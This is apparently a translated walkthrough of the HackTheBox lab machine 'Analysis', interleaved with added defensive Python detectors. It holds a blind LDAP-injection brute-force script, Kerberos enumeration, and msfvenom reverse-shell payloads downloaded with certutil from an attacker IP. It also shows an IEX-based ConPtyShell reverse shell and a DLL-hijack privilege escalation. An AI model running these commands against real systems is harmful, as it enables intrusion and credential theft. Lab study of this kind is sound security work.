Video version
All new walkthroughs appear first on the channel t.me/kiberdruzhinnik. Subscribe so you don't miss new ones!
Service overview
Let's start with a port scan right away.
$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.11.32 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.11.32:53
Open 10.129.11.32:88
Open 10.129.11.32:80
Open 10.129.11.32:464
Open 10.129.11.32:445
Open 10.129.11.32:389
Open 10.129.11.32:636
Open 10.129.11.32:593
Open 10.129.11.32:5985
Open 10.129.11.32:3306
Open 10.129.11.32:3269
Open 10.129.11.32:3268
Open 10.129.11.32:9389
Open 10.129.11.32:33060
Open 10.129.11.32:47001
Open 10.129.11.32:49664
Open 10.129.11.32:49665
Open 10.129.11.32:49666
Open 10.129.11.32:49670
Open 10.129.11.32:49667
Open 10.129.11.32:49669
Open 10.129.11.32:49671
Open 10.129.11.32:49674
Open 10.129.11.32:49683
Open 10.129.11.32:49693
Open 10.129.11.32:49708
Open 10.129.11.32:63479
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.11.32
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-20 14:20 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Initiating Ping Scan at 14:20
Scanning 10.129.11.32 [2 ports]
Completed Ping Scan at 14:20, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:20
Completed Parallel DNS resolution of 1 host. at 14:20, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:20
Scanning 10.129.11.32 [27 ports]
Discovered open port 445/tcp on 10.129.11.32
Discovered open port 80/tcp on 10.129.11.32
Discovered open port 53/tcp on 10.129.11.32
Discovered open port 3306/tcp on 10.129.11.32
Discovered open port 3269/tcp on 10.129.11.32
Discovered open port 49693/tcp on 10.129.11.32
Discovered open port 49674/tcp on 10.129.11.32
Discovered open port 49683/tcp on 10.129.11.32
Discovered open port 464/tcp on 10.129.11.32
Discovered open port 593/tcp on 10.129.11.32
Discovered open port 3268/tcp on 10.129.11.32
Discovered open port 88/tcp on 10.129.11.32
Discovered open port 49671/tcp on 10.129.11.32
Discovered open port 636/tcp on 10.129.11.32
Discovered open port 49666/tcp on 10.129.11.32
Discovered open port 49667/tcp on 10.129.11.32
Discovered open port 49664/tcp on 10.129.11.32
Discovered open port 389/tcp on 10.129.11.32
Discovered open port 49708/tcp on 10.129.11.32
Discovered open port 63479/tcp on 10.129.11.32
Discovered open port 5985/tcp on 10.129.11.32
Discovered open port 33060/tcp on 10.129.11.32
Discovered open port 49670/tcp on 10.129.11.32
Discovered open port 9389/tcp on 10.129.11.32
Discovered open port 47001/tcp on 10.129.11.32
Discovered open port 49665/tcp on 10.129.11.32
Discovered open port 49669/tcp on 10.129.11.32
Completed Connect Scan at 14:20, 0.10s elapsed (27 total ports)
Initiating Service scan at 14:20
Scanning 27 services on 10.129.11.32
Service scan Timing: About 62.96% done; ETC: 14:21 (0:00:32 remaining)
Completed Service scan at 14:21, 60.48s elapsed (27 services on 1 host)
NSE: Script scanning 10.129.11.32.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 8.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 3.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Nmap scan report for 10.129.11.32
Host is up, received syn-ack (0.050s latency).
Scanned at 2024-01-20 14:20:20 EST for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-01-20 19:20:26Z)
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL (unauthorized)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
49683/tcp open msrpc syn-ack Microsoft Windows RPC
49693/tcp open msrpc syn-ack Microsoft Windows RPC
49708/tcp open msrpc syn-ack Microsoft Windows RPC
63479/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-20T19:21:24
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38616/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32463/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17404/udp): CLEAN (Timeout)
| Check 4 (port 23246/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.83 seconds
Let's add the host analysis.htb to /etc/hosts and run gobuster.
We see a DNS server among the open ports, so let's try brute-forcing subdomains.
$ gobuster dns -d analysis.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r analysis.htb:53
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: analysis.htb
[+] Threads: 10
[+] Resolver: analysis.htb:53
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: www.analysis.htb
Found: internal.analysis.htb
Found: gc._msdcs.analysis.htb
Found: domaindnszones.analysis.htb
Found: forestdnszones.analysis.htb
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished
===============================================================
Let's add these domains to /etc/hosts as well.
Internal portal
We can't get in just like that.
With gobuster we find a login form: http://internal.analysis.htb/employees/login.php
Finding valid usernames
cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt
sed -i "s|$|@analysis.htb|" possible-usernames.txt
./kerbrute userenum -d analysis.htb possible-usernames.txt --dc analysis.htb
LDAP injection
Eventually, after a few more gobuster runs, we find the link http://internal.analysis.htb/users/list.php.
We try to guess the parameter and end up with name.
Let's try injecting * and we get a username:
Let's use a script to brute-force the user's password.
package main

import (
    "bufio"
    "fmt"
    "io"
    "net/http"
    "net/url"
    "os"
    "strings"
)

// Boolean-blind LDAP injection: the page lists the user "technician" only when the injected
// (description=<prefix><candidate>*) clause matches, so candidates are tested one at a time.
const baseURL = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"

// readCharset loads the candidate characters once, so every pass can start again from the first one
// (the original file.Seek(0, 0) did not reset the bufio.Scanner, which had already buffered the file).
func readCharset(path string) ([]string, error) {
    file, err := os.Open(path)
    if err != nil {
        return nil, err
    }
    defer file.Close()
    var chars []string
    scanner := bufio.NewScanner(file)
    for scanner.Scan() {
        if c := strings.TrimSpace(scanner.Text()); c != "" {
            chars = append(chars, c)
        }
    }
    return chars, scanner.Err()
}

// matches reports whether the page contains the marker for this prefix + candidate.
func matches(found, candidate string) (bool, error) {
    // Query-escape the fuzzed values so characters like # or + survive the URL.
    target := strings.Replace(baseURL, "{FUZZ}", url.QueryEscape(candidate), 1)
    target = strings.Replace(target, "{found_char}", url.QueryEscape(found), 1)
    fmt.Println("Trying:", target)
    resp, err := http.Get(target)
    if err != nil {
        return false, err
    }
    defer resp.Body.Close() // closed per request, not deferred until main returns
    body, err := io.ReadAll(resp.Body)
    if err != nil {
        return false, err
    }
    return resp.StatusCode == http.StatusOK && strings.Contains(string(body), "technician"), nil
}

func main() {
    // Prompt user for wordlist input
    fmt.Print("Enter the wordlist or charset (press Enter to use the default): ")
    input := bufio.NewScanner(os.Stdin)
    input.Scan()
    charsetPath := strings.TrimSpace(input.Text())
    // Use default wordlist if user didn't provide one
    if charsetPath == "" {
        charsetPath = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
    }
    chars, err := readCharset(charsetPath)
    if err != nil {
        fmt.Println("Error reading charset file:", err)
        return
    }
    foundChars := ""
    for {
        progressed := false
        // Note: "*" is an LDAP wildcard, so once the charset reaches it every candidate matches;
        // that is why the script only recovers the password up to that character.
        for _, char := range chars {
            ok, err := matches(foundChars, char)
            if err != nil {
                fmt.Println("Error making HTTP request:", err)
                return
            }
            if ok {
                fmt.Println("Found character:", char)
                foundChars += char
                progressed = true
                break // restart from the first candidate with the longer prefix
            }
        }
        if !progressed {
            break
        }
    }
    fmt.Println("Final found characters:", foundChars)
}
The script iterates over characters. If it sees the nickname technician on the page, it remembers the character. The script isn't perfect, but it lets us recover half of the password, up to the * character.
Then we pick up the rest using the following approach: http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=*)
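As an added defender-side example (not code from the page or from the box): the RFC 4515 escaping that would have made list.php's name parameter inert, with the assumed vulnerable concatenation beside it, plus a check that flags the same payload shape in IIS W3C log lines. The filter shape of list.php and the log field order are assumptions; the sample log is constructed.

```python
"""Neutralize the list.php injection: escape the name before it enters the filter, and flag attempts in IIS logs."""
import re
from urllib.parse import parse_qs

# RFC 4515: these characters must be escaped as \XX inside an LDAP filter assertion value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def ldap_escape_filter(value):
    """Return value with every filter metacharacter replaced by its two-hex-digit escape."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_user_filter_vulnerable(name):
    """Assumed shape of the original list.php query: raw concatenation, so name can close and extend the filter."""
    return f"(&(objectClass=user)(name={name}))"

def build_user_filter(name):
    """Hardened form: the same query, but the user-supplied name can only ever be a literal value."""
    return f"(&(objectClass=user)(name={ldap_escape_filter(name)}))"

# Fragments that never belong in a person's name but appear in every boolean-blind payload.
_INJECTION_MARKERS = re.compile(r"\)\s*\(|\(\s*[&|!]|\*\)|objectclass=", re.IGNORECASE)

def flag_ldap_injection(iis_log_line):
    """Return (client_ip, decoded name) when an IIS W3C log line carries a suspicious name= value, else None.
    Assumed field order: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip ..."""
    fields = iis_log_line.split()
    if len(fields) < 9 or fields[0].startswith("#"):
        return None
    for value in parse_qs(fields[5]).get("name", []):  # parse_qs decodes %26 etc. inside the value
        if _INJECTION_MARKERS.search(value):
            return fields[8], value
    return None

def scan_log(text):
    return [hit for hit in map(flag_ldap_injection, text.splitlines()) if hit]

# Constructed sample log, not from the page: one benign lookup and one payload of the kind used above.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-20 19:30:01 10.129.11.32 GET /users/list.php name=technician 80 - 10.10.14.98 Mozilla/5.0 200
2024-01-20 19:30:05 10.129.11.32 GET /users/list.php name=*)(%26(objectClass=user)(description=a*) 80 - 10.10.14.98 Go-http-client/1.1 200
"""

if __name__ == "__main__":
    payload = "*)(&(objectClass=user)(description=a*)"
    print(build_user_filter_vulnerable(payload))  # injected clause becomes part of the query
    print(build_user_filter(payload))             # same input, now an inert literal
    print(scan_log(SAMPLE_LOG))
```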
$ ./kerbrute bruteuser -d analysis.htb --dc analysis.htb passwords.txt technician
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 01/21/24 - Ronnie Flathers @ropnop
2024/01/21 03:01:49 > Using KDC(s):
2024/01/21 03:01:49 > analysis.htb:88
2024/01/21 03:01:49 > [!] technician@analysis.htb: - client has neither a keytab nor a password set and no session
2024/01/21 03:01:49 > [+] VALID LOGIN: technician@analysis.htb:pwd
2024/01/21 03:01:49 > Done! Tested 2 logins (1 successes) in 0.284 seconds
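An added detection example, not from the page: both the kerbrute userenum run earlier and the bruteuser run above leave a trail on the domain controller, and this script flags a source that probes many non-existent accounts (event 4768, result 0x6) or fails pre-authentication repeatedly (event 4771, result 0x18) inside one window. The CSV event shape is an assumption and the sample events are constructed.

```python
"""Detect Kerberos user enumeration and password guessing from DC security events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not from the page, in a flat CSV shape assumed here:
# timestamp, event id, Kerberos result code, target account, client address.
#   4768 with 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN: a TGT request for an account that does not exist,
#                    which is what a userenum wordlist run leaves behind for every miss
#   4771 with 0x18 = KDC_ERR_PREAUTH_FAILED: wrong password for an existing account (password guessing)
SAMPLE_EVENTS = """timestamp,event_id,result_code,target_user,client_ip
2024-01-21T03:01:40,4768,0x6,aaron,10.10.14.98
2024-01-21T03:01:40,4768,0x6,abby,10.10.14.98
2024-01-21T03:01:41,4768,0x6,adam,10.10.14.98
2024-01-21T03:01:49,4771,0x18,technician,10.10.14.98
2024-01-21T03:01:49,4771,0x18,technician,10.10.14.98
2024-01-21T03:05:12,4768,0x0,jdoe,10.129.11.50
2024-01-21T03:05:13,4768,0x6,jdeo,10.129.11.50
"""

def parse_events(text):
    """Parse the CSV above into (time, event_id, result_code, user, client_ip) tuples."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        ts, eid, code, user, ip = line.split(",")
        rows.append((datetime.fromisoformat(ts), int(eid), int(code, 16), user, ip))
    return rows

def detect_kerberos_guessing(events, window=timedelta(minutes=5), unknown_threshold=3, preauth_threshold=2):
    """Return {client_ip: {"unknown_users": n, "preauth_failures": n}} for every source that, inside one
    sliding window, probed at least unknown_threshold distinct non-existent accounts (enumeration) or
    failed pre-authentication at least preauth_threshold times (password guessing)."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[4]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        for start in range(len(evs)):
            unknown, preauth = set(), 0
            for ts, eid, code, user, _ in evs[start:]:
                if ts - evs[start][0] > window:
                    break
                if eid == 4768 and code == 0x6:
                    unknown.add(user)
                elif eid == 4771 and code == 0x18:
                    preauth += 1
            if len(unknown) >= unknown_threshold or preauth >= preauth_threshold:
                alerts[ip] = {"unknown_users": len(unknown), "preauth_failures": preauth}
                break  # one alert per source is enough
    return alerts

if __name__ == "__main__":
    print(detect_kerberos_guessing(parse_events(SAMPLE_EVENTS)))
```

Real thresholds should be far higher than the demo values; a userenum run with the 10-million-name list produces thousands of 0x6 failures per minute from one address.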
Let's use the obtained password on the page http://internal.analysis.htb/employees/login.php.
Go to the Soc Report tab and upload any PHP webshell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4242 -f exe -o s.exe
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4242
run
python3 -m http.server 8081
certutil -urlcache -f http://10.10.14.98:8081/s.exe %temp%/s.exe
start %temp%/s.exe
Possibly useful
C:\inetpub\internal\users>type list.php
type list.php
<?php
//LDAP Bind paramters, need to be a normal AD User account.
error_reporting(0);
$ldap_password = 'pwd2';
$ldap_username = 'webservice@analysis.htb';
C:\inetpub\internal\employees>type login.php
type login.php
<?php
$host = "localhost";
$username = "db_master";
$password = 'pwd3';
$database = "employees";
RunasCs as webservice
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/master/RunasCs.cs
mcs RunasCs.cs
Let's upload the RunasCs.exe binary to the machine.
cd C:/Windows/TEMP
upload RunasCs.exe runascs.exe
https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1
wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1
python3 -m http.server 8081
A custom nc invocation on the local machine:
stty raw -echo; (stty size; cat) | nc -lvnp 4243
In meterpreter as technician:
runascs.exe "webservice" "pwd2" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.98:8081/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.98 -RemotePort 4243 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
In the console as webservice:
powershell -c "cmd /c certutil -urlcache -f http://10.10.14.98:8081/s4.exe %temp%/s4.exe"
start %temp%/s4.exe
https://github.com/itm4n/PrivescCheck
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
upload PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
Autologon is enabled:
Repeat, but now with the new password:
runascs.exe "jdoe" "pwd4" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.98:8081/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.98 -RemotePort 4243 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
powershell -c "cmd /c certutil -urlcache -f http://10.10.14.98:8081/s4.exe %temp%/s4.exe"
start %temp%/s4.exe
User flag
Privilege escalation
Reconnect as jdoe:
$ evil-winrm -u jdoe -i analysis.htb -p 'pwd4'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents>
Wrong path
*Evil-WinRM* PS C:\snort\lib> icacls snort_dynamicpreprocessor
snort_dynamicpreprocessor AUTORITE NT\Système:(I)(OI)(CI)(F)
BUILTIN\Administrateurs:(I)(OI)(CI)(F)
BUILTIN\Utilisateurs:(I)(OI)(CI)(RX)
BUILTIN\Utilisateurs:(I)(CI)(AD)
BUILTIN\Utilisateurs:(I)(CI)(WD)
CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4242 -f dll -o sf_shell.dll
upload sf_shell.dll C:/snort/lib/snort_dynamicpreprocessor
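An added example, not from the page: a parser for icacls output like the listing above that reports which principals outside the usual trusted set hold rights allowing them to add or replace files in a directory, which is exactly the misconfiguration the DLL drop relies on. The trusted-principal list (English and French names) and the no-spaces-in-path assumption are mine; the sample listing is constructed to match the page's.

```python
"""Flag directories whose ACL lets low-privilege principals drop or replace files, from icacls output."""
import re

# Principals expected to hold write rights on program directories (English and French names,
# since the host in this walkthrough reports a French locale).
TRUSTED_PRINCIPALS = {
    r"NT AUTHORITY\SYSTEM", r"AUTORITE NT\Système",
    r"BUILTIN\Administrators", r"BUILTIN\Administrateurs",
    "CREATOR OWNER", "CREATEUR PROPRIETAIRE",
    r"NT SERVICE\TrustedInstaller",
}
# icacls rights that allow creating, replacing or re-permissioning entries in a directory.
WRITE_CLASS_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")

def parse_icacls(text):
    """Return (path, [(principal, [right, ...]), ...]) from one icacls listing.
    Assumes the path contains no spaces: icacls prints it before the first ACE on the first line."""
    path, aces = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if path is None and ":(" in line:
            path, line = line.split(" ", 1)
        m = ACE_RE.match(line)
        if not m:
            continue  # blank lines, the summary line, anything that is not an ACE
        rights = [r for grp in re.findall(r"\(([^)]*)\)", m.group("rights")) for r in grp.split(",")]
        aces.append((m.group("principal"), rights))
    return path, aces

def weak_write_acl(text):
    """Map each untrusted principal to the write-class rights it holds on the listed directory."""
    _, aces = parse_icacls(text)
    findings = {}
    for principal, rights in aces:
        if principal in TRUSTED_PRINCIPALS:
            continue
        hits = WRITE_CLASS_RIGHTS.intersection(rights)
        if hits:
            findings.setdefault(principal, set()).update(hits)
    return findings

# Constructed sample in the same shape as the icacls output above (localized French names).
SAMPLE_ICACLS = r"""snort_dynamicpreprocessor AUTORITE NT\Système:(I)(OI)(CI)(F)
                          BUILTIN\Administrateurs:(I)(OI)(CI)(F)
                          BUILTIN\Utilisateurs:(I)(OI)(CI)(RX)
                          BUILTIN\Utilisateurs:(I)(CI)(AD)
                          BUILTIN\Utilisateurs:(I)(CI)(WD)
                          CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print(weak_write_acl(SAMPLE_ICACLS))  # BUILTIN\Utilisateurs holds AD and WD: any user can add files here
```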